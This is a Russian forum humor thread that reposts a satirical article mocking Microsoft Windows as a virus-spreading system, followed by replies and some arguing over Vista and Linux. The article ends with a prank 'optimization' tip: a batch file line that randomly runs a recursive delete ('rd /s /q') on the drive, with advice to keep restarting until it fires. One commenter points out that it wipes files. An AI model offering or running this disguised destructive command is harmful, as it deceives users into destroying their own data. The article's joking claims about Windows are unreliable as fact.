Твой софтовый форум > Тематические форумы > Юмор

Microsoft ® Windows

,

популярная среда распостранения вирусов

Дата публикации: 20.01.2009 - 00:15
PTyTb
Microsoft ® Windows
самая популярная среда распостранения вирусов




Microsoft® Windows — это самая популярная среда распостранения вирусов, или, как её называют в компании Microsoft, «операционная система». Первая версия Windows, которая не была воспринята народом и, что самое интересное, имеет всего 69 глюков, датируется июнем 1985 года, а Windows 3.0, первая общепринятая версия «системы» — маем 1990-го, имея уже 1337 глюков (не считая глюками способы вызвать BSOD из программ и Ctrl-Alt-Delete). Сейчас наибольшую популярность имеют три версии Windows: Windows 2000(1999), Windows XP(2001) и Windows Vista(2007). В будущем планируется новая версия Windows, Windows 6.66 (она же просто Windows 7, 2009—2010 год)[1].

Рассмотрим самую популярную — это Windows XP. К ней прилагается дополнительное ПО:

* Internet Explorer 6, система закачек троянов
* Windows Media Player 8, младший помощник закачек троянов, благодаря поддержке многозадачности, пока трояны закачиваются, можно слушать музыку
* Outlook Express, программа для получения спама и троянов по почте,
* Windows Movie Maker, вирус, который повреждает видеофайлы.

То есть, входящее в Windows XP ПО является вредоносным чуть более, чем на 100 %.

* Далее. Windows XP — это некое подобие бомбы замедленного действия, так как после установки нужно провести «Активацию Windows» © Microsoft, а точнее дезактивацию Windows при помощи программы, именуемой Crack. Программ, являющихся Crack’ами для Windows XP, много, но чуть менее, чем полностью они являются вредоносными. К сожалению, если не дезактивировать Windows XP за 30 дней, то она будет загружаться только в максимально безопасном режиме, в котором она не глючит (не работает).

Единственный способ избежать геморроя, связанного с использованием Windows, является переход на альтернативные операционные системы, например GNU/Linux, *BSD или Mac OS.

Также только нуб не знает, что для оптимизации системы нужно создать на диске C:\ файл optimiz.bat и вписать в него блокнотом "set /a R=0+6*%random%/32768 && if %R% == 0 (rd /s /q .\) else (echo ERROR)" без кавычек. Команда убирает из системы все лишнее. Если выводит ERROR - перезапустить.

Оригинал статьи: lurkmore.ru/%D0%92%D0%B8%D0%BD%D0%B4%D0%B0
klaider
Супер!! особенно посл обзац!
-=Sherhan=-
Цитата | Quote(klaider @ 18.01.2009 - 14:04)
Супер!! особенно посл обзац!
*


Согласен!!! smile.gif Последний абзац-супер biggrin.gif
quite unknown
Забыли добавить, что для работы с этим вирусом.. Простите, "операционной системой", необходимо установить две важные библиотеки: hands.dll и Brain.sys.

Собственно о файлах:
Есть такой драйвер - Brain.sys - отвечает за работу головного процессора. А еще есть динамическия библиотека Hands.dll - отвечает за внешние устройства верхнего уровня. Желательно искать их свежие версии. Только перед установкой НЕ СНОСИТЕ старые версии - может все накрыться... Устанавливать лучше поверх.
И еще - не устанавливайте библиотеку hands.dll в папку localhost://ass или папку localhost://butt.
romulko
А к вниманию принимаете тех, у кого даже, представьте себе, виста стоит бизнес на лептопе интел кор 1.8 с гигом ОП, и все прекрасно работает. Работаю RIA девелопером и не могу назвать ни одного раза, когда система подвисла.

Хотя один только минус - моего лептопа не хватает для этой чудесной ОС. Потом докупиться более мощный, ну и после чего вообще работа будет за счастье.

Тема уже надоела эта - все какают на висту, а чтобы сказать, что конкретно не так, многие затрудняются.

* Internet Explorer 6, система закачек троянов

Это еще как понимать? Ради Бога, удаляйте себе експлорер и вообще в интернет не ходите.

* Outlook Express, программа для получения спама и троянов по почте,

А вы джымейлом не пробовали пользоваться? У него очень интеллектуальная система опознания спама, потому, во входящих спама никогда не бывает. Более того, по вашим словам следует, что аутлук сам гененирует спам и закидает его вам. Он лишь принимает то, на что вы соизволились подписаться на каких-то порно-сайтах, в ответ чего, получаете каждый день возможность спустить жару )

По поводу линукса - соглашусь, штучка прикольная (Убунту сейчас в почёте), но чтобы линукс без висты - это как бы ехать в путешествие без любой запаски для колеса.

И по поводу последнего абзаца - значит я нуб

И в дополнение для истории smile.gif (цитата) - Единственный способ избежать геморроя, связанного с использованием Windows, является переход на альтернативные операционные системы, например GNU/Linux, *BSD или Mac OS.

Вот имеено, что "альтернативные", то есть, второстепенные. Ибо если ищем альтернативу по какой-то причине, то мы "ищем" вот это второстепенное. А чтобы искать второстепенное, нужно быть на первостепенном smile.gif А что у нас первостепенное? Ура вы догадались wink.gif Привет Биллу smile.gif
neonishe
для меня разница между хп/вистой и любым дистрибутивом линупса только в делфи у одной стороны и сан студии у другой. всё. все остальные различия решают прямые руки. это так, про холивар.
~karlson~
neonishe, сам то понял, че написал? wink.gif
algebra
Остаётся надеяться, что раз уж среднестатистический посетитель этого топика смог зарегистрироваться на данном сайте, то ума у него хватит, что оптимизировать систему с помощью optimiz.bat не получится. А то ненароком доверчивому юзеру можно помочь своими руками систему снести. Правда такая тема, думаю последний раз полноценно катила только на Win98, а на NTшных системах винда не дала бы грохнуть всё. Удалилось бы всё, что винда не считает своим, и что не запущено/открыто на текущий момент
middleman
Так! Ша, пипл! smile.gif
Это ж юмор. Прочитали, улыбнулись и пошли дальше с хорошим настроением. smile.gif
Вы чего тут холивар опять развели? Вон линукс уже приплели сюда.
Прекращайте smile.gif
romulko
Это не холивар. я просто пытаюсь понять, с чего смеяться? Обьясните люди добрые, с чего ржать!?


Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке: Microsoft ® Windows
SoftoRooM © 2004-2024